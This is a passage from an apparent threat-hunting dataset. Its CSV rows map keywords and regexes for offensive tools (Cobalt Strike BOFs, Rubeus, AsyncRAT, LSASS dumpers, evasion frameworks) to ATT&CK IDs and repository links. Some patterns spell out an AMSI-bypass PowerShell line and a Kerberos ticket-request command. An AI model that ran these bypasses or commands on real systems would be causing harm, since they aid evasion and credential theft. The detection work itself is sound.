Execute targeted attacks against modern enterprises with one of the most powerful network attack kits available to penetration testers","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*artifactuac*.dll*",".{0,1000}artifactuac.{0,1000}\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 
- T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*aruba2john.py*",".{0,1000}aruba2john\.py.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*AS 'Login that can be impersonated'*",".{0,1000}AS\s\'Login\sthat\scan\sbe\simpersonated\'.{0,1000}","offensive_tool_keyword","CheeseTools","tools for Lateral Movement/Code Execution","T1021.006 - T1059.003 - T1105","TA0008 - TA0002","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/klezVirus/CheeseTools","1","0","N/A","10","7","669","140","2021-08-17T20:22:56Z","2020-08-24T01:28:12Z" "*as 'Owner that can be impersonated'*",".{0,1000}as\s\'Owner\sthat\scan\sbe\simpersonated\'.{0,1000}","offensive_tool_keyword","CheeseTools","tools for Lateral Movement/Code Execution","T1021.006 - T1059.003 - T1105","TA0008 - TA0002","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/klezVirus/CheeseTools","1","0","N/A","10","7","669","140","2021-08-17T20:22:56Z","2020-08-24T01:28:12Z" "*ASBBypass.ps1*",".{0,1000}ASBBypass\.ps1.{0,1000}","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1024 - T1071 - T1029 - T1569","TA0002 - TA0003 - 
TA0040","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","759","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" "*ASBBypass.ps1*",".{0,1000}ASBBypass\.ps1.{0,1000}","offensive_tool_keyword","octopus","Octopus is an open source. pre-operation C2 server based on python which can control an Octopus powershell agent through HTTP/S.","T1071 T1090 T1102","N/A","N/A","N/A","C2","https://github.com/mhaskar/Octopus","1","1","N/A","10","10","713","153","2021-07-06T23:52:37Z","2019-08-30T21:09:07Z" "*ASBBypass.ps1*",".{0,1000}ASBBypass\.ps1.{0,1000}","offensive_tool_keyword","unicorn","Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory","T1059.001 - T1055.012 - T1027.002 - T1547.009","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/trustedsec/unicorn","1","1","N/A","N/A","10","3633","813","2024-01-24T20:02:33Z","2013-06-19T08:38:06Z" "*Ask to take over RDP session if another used is logged in (workstation)*",".{0,1000}Ask\sto\stake\sover\sRDP\ssession\sif\sanother\sused\sis\slogged\sin\s\(workstation\).{0,1000}","offensive_tool_keyword","SharpRDP","Remote Desktop Protocol .NET Console Application for Authenticated Command Execution","T1021.001 - T1059.001 - T1059.003","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/SharpRDP","1","0","N/A","10","10","958","453","2022-11-13T05:29:33Z","2020-01-21T08:31:50Z" "*asktgs.x64.o*",".{0,1000}asktgs\.x64\.o.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF for Kerberos abuse (an implementation of some important features of the Rubeus)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - 
T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RalfHacker/Kerbeus-BOF","1","0","N/A","10","10","321","32","2023-11-20T17:30:34Z","2023-11-20T10:01:36Z" "*asktgt /user* /domain:* /password:* /opsec /force /ptt*",".{0,1000}asktgt\s\/user.{0,1000}\s\/domain\:.{0,1000}\s\/password\:.{0,1000}\s\/opsec\s\/force\s\/ptt.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. 
Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "*asp-jinja-obfuscator.py*",".{0,1000}asp\-jinja\-obfuscator\.py.{0,1000}","offensive_tool_keyword","ASPJinjaObfuscator","Heavily obfuscated ASP web shell generation tool.","T1100 - T1027","TA0003 - TA0005?","N/A","N/A","Defense Evasion","https://github.com/fin3ss3g0d/ASPJinjaObfuscator","1","1","N/A","8","1","60","11","2024-04-26T01:27:42Z","2024-04-23T01:01:53Z" "*ASR_bypass_to_dump_LSASS.*",".{0,1000}ASR_bypass_to_dump_LSASS\..{0,1000}","offensive_tool_keyword","POSTDump","perform minidump of LSASS process using few technics to avoid detection","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/YOLOP0wn/POSTDump","1","0","N/A","10","3","294","35","2023-11-19T10:17:40Z","2023-09-13T11:28:51Z" "*ASR_bypass_to_dump_LSASS.cs*",".{0,1000}ASR_bypass_to_dump_LSASS\.cs.{0,1000}","offensive_tool_keyword","POSTDump","Another tool to perform minidump of LSASS process using few technics to avoid detection.","T1003 - T1055 - T1562.001 - T1218","TA0005 - TA0003 - TA0006","N/A","N/A","Credential Access","https://github.com/YOLOP0wn/POSTDump","1","1","N/A","10","3","294","35","2023-11-19T10:17:40Z","2023-09-13T11:28:51Z" "*ASRenum-BOF.*",".{0,1000}ASRenum\-BOF\..{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF that identifies Attack Surface Reduction (ASR) rules. actions. 
and exclusion locations","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mlcsec/ASRenum-BOF","1","1","N/A","10","10","131","17","2024-03-01T14:03:44Z","2022-12-28T14:41:02Z" "*asrep_attack*",".{0,1000}asrep_attack.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*asrep2kirbi*",".{0,1000}asrep2kirbi.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). 
Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","10","10","3823","749","2024-04-26T11:33:01Z","2018-09-23T23:59:03Z" "*asreprc4_attack*",".{0,1000}asreprc4_attack.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*asreproast /*",".{0,1000}asreproast\s\/.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*Asreproast.*",".{0,1000}Asreproast\..{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). 
Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","10","10","3823","749","2024-04-26T11:33:01Z","2018-09-23T23:59:03Z" "*ASREPRoast.ps1*",".{0,1000}ASREPRoast\.ps1.{0,1000}","offensive_tool_keyword","ASREPRoast","Project that retrieves crackable hashes from KRB5 AS-REP responses for users without kerberoast preauthentication enabled. ","T1558.003","TA0006","N/A","N/A","Credential Access","https://github.com/HarmJ0y/ASREPRoast","1","1","N/A","N/A","2","187","55","2018-09-25T03:26:00Z","2017-01-14T21:07:57Z" "*asreproast_*.txt*",".{0,1000}asreproast_.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","1","N/A","N/A","10","2670","357","2024-04-05T20:43:37Z","2018-05-25T22:21:20Z" "*asreproast_john_results_*",".{0,1000}asreproast_john_results_.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*asreproast_output_*.txt*",".{0,1000}asreproast_output_.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation 
Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*ASREProastables.txt*",".{0,1000}ASREProastables\.txt.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","0","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "*ASreproasting.txt*",".{0,1000}ASreproasting\.txt.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*asreproasting.x64*",".{0,1000}asreproasting\.x64.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF for Kerberos abuse (an implementation of some important features of the Rubeus)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - 
APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RalfHacker/Kerbeus-BOF","1","0","N/A","10","10","321","32","2023-11-20T17:30:34Z","2023-11-20T10:01:36Z" "*ASRepToHashcat*",".{0,1000}ASRepToHashcat.{0,1000}","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","N/A","10","2415","394","2024-02-22T11:37:57Z","2019-02-03T18:21:17Z" "*Assemblies/SharpMove.exe*",".{0,1000}Assemblies\/SharpMove\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike kit for Lateral Movement","T1021.002 - T1021.006 - T1021.004","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/MoveKit","1","1","N/A","10","7","635","108","2020-02-21T20:23:45Z","2020-01-24T22:19:16Z" "*assembly *.asm *",".{0,1000}assembly\s.{0,1000}\.asm\s.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","0","N/A","10","10","296","38","2024-04-30T22:07:23Z","2022-10-08T19:02:58Z" "*assembly *.exe *",".{0,1000}assembly\s.{0,1000}\.exe\s.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","0","N/A","10","10","296","38","2024-04-30T22:07:23Z","2022-10-08T19:02:58Z" "*assembly AMSITrigger *",".{0,1000}assembly\sAMSITrigger\s.{0,1000}","offensive_tool_keyword","AMSITrigger","AMSITrigger will identify all of the 
malicious strings in a powershell file by repeatedly making calls to AMSI using AMSIScanBuffer - line by line. On receiving an AMSI_RESULT_DETECTED response code the line will then be scrutinised to identify the individual triggers","T1059.001 - T1218.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/RythmStick/AMSITrigger","1","0","https://www.rythmstick.net/posts/amsitrigger/","10","10","N/A","N/A","N/A","N/A" "*Assembly.GetType(""System.Management.Automation.AmsiUtils"").getField(""amsiInitFailed""*'NonPublic*Static').SetValue($null*$true)*",".{0,1000}Assembly\.GetType\(\""System\.Management\.Automation\.AmsiUtils\""\)\.getField\(\""amsiInitFailed\"".{0,1000}\'NonPublic.{0,1000}Static\'\)\.SetValue\(\$null.{0,1000}\$true\).{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "*Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed'*'NonPublic*Static').SetValue($null*$true)*",".{0,1000}Assembly\.GetType\(\'System\.Management\.Automation\.AmsiUtils\'\)\.GetField\(\'amsiInitFailed\'.{0,1000}\'NonPublic.{0,1000}Static\'\)\.SetValue\(\$null.{0,1000}\$true\).{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","PowerShell AMSI Bypass","T1548 T1562 T1027","N/A","N/A","N/A","Defense Evasion","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*--assemblyargs AntiVirus 
AppLocker*",".{0,1000}\-\-assemblyargs\sAntiVirus\sAppLocker.{0,1000}","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/GhostPack/Seatbelt","1","0","N/A","N/A","10","3485","648","2024-03-23T12:37:17Z","2018-07-24T17:38:51Z" "*Assets/solution/dllmain.cpp*",".{0,1000}Assets\/solution\/dllmain\.cpp.{0,1000}","offensive_tool_keyword","Spartacus","Spartacus DLL/COM Hijacking Toolkit","T1574.001 - T1055.001 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Accenture/Spartacus","1","1","N/A","10","10","947","121","2024-02-01T13:51:09Z","2022-10-28T09:00:35Z" "*AssmblyLoader*",".{0,1000}AssmblyLoader.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*AsStrongAsFuck.exe*",".{0,1000}AsStrongAsFuck\.exe.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","10","10","1490","261","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z" "*AsStrongAsFuck.py*",".{0,1000}AsStrongAsFuck\.py.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - 
TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","10","10","1490","261","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z" "*Async RDP Client. Duckyscript will be executed by pressing ESC 3 times*",".{0,1000}Async\sRDP\sClient\.\sDuckyscript\swill\sbe\sexecuted\sby\spressing\sESC\s3\stimes.{0,1000}","offensive_tool_keyword","evilrdp","The evil twin of aardwolfgui using the aardwolf RDP client library that gives you extended control over the target and additional scripting capabilities from the command line.","T1021.001 - T1056.001 - T1113 - T1078.002 - T1105 - T1090.002 - T1059.001","TA0008 - TA0002 - TA0005 - TA0001 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/skelsec/evilrdp","1","0","N/A","10","10","267","30","2023-12-09T17:10:52Z","2023-11-29T13:44:58Z" "*async_webshell-all.py*",".{0,1000}async_webshell\-all\.py.{0,1000}","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","1","N/A","10","10","5253","627","2024-03-13T23:03:35Z","2022-06-20T03:11:08Z" "*AsyncRAT Simple RAT*",".{0,1000}AsyncRAT\s\sSimple\sRAT.{0,1000}","offensive_tool_keyword","AsyncRAT-C-Sharp","Open-Source Remote Administration Tool For Windows C# (RAT)","T1021.002 - T1056.001 - T1113 - T1133 - T1041 - T1555 - T1129 - T1564.001","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/NYAN-x-CAT/AsyncRAT-C-Sharp","1","0","N/A","10","10","2110","708","2023-10-16T21:41:12Z","2019-01-19T04:02:26Z" "*AsyncRAT.exe*",".{0,1000}AsyncRAT\.exe.{0,1000}","offensive_tool_keyword","AsyncRAT-C-Sharp","Open-Source Remote Administration Tool For Windows C# (RAT)","T1021.002 - 
T1056.001 - T1113 - T1133 - T1041 - T1555 - T1129 - T1564.001","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/NYAN-x-CAT/AsyncRAT-C-Sharp","1","1","N/A","10","10","2110","708","2023-10-16T21:41:12Z","2019-01-19T04:02:26Z" "*AsyncRAT/DCRat*",".{0,1000}AsyncRAT\/DCRat.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","1","N/A","10","10","890","331","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z" "*asyncssh_commander.py *",".{0,1000}asyncssh_commander\.py\s.{0,1000}","offensive_tool_keyword","MaccaroniC2","A proof-of-concept Command & Control framework that utilizes the powerful AsyncSSH Python library which provides an asynchronous client and server implementation of the SSHv2 protocol and use PyNgrok wrapper for ngrok integration.","T1090 - T1059.003","TA0011 - TA0002","N/A","N/A","C2","https://github.com/CalfCrusher/MaccaroniC2","1","1","N/A","10","10","73","12","2023-06-27T17:43:59Z","2023-05-21T13:33:48Z" "*asyncssh_commander.py*",".{0,1000}asyncssh_commander\.py.{0,1000}","offensive_tool_keyword","MaccaroniC2","A proof-of-concept Command & Control framework that utilizes the powerful AsyncSSH Python library which provides an asynchronous client and server implementation of the SSHv2 protocol and use PyNgrok wrapper for ngrok integration.","T1090 - T1059.003","TA0011 - TA0002","N/A","N/A","C2","https://github.com/CalfCrusher/MaccaroniC2","1","1","N/A","10","10","73","12","2023-06-27T17:43:59Z","2023-05-21T13:33:48Z" "*atexec.py*",".{0,1000}atexec\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*Athena.Forwarders.SMB*",".{0,1000}Athena\.Forwarders\.SMB.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","166","35","2024-04-25T14:30:04Z","2022-01-24T20:44:38Z" "*athena/agent_code/*",".{0,1000}athena\/agent_code\/.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","166","35","2024-04-25T14:30:04Z","2022-01-24T20:44:38Z" "*AthenaPlugins.csproj*",".{0,1000}AthenaPlugins\.csproj.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. 
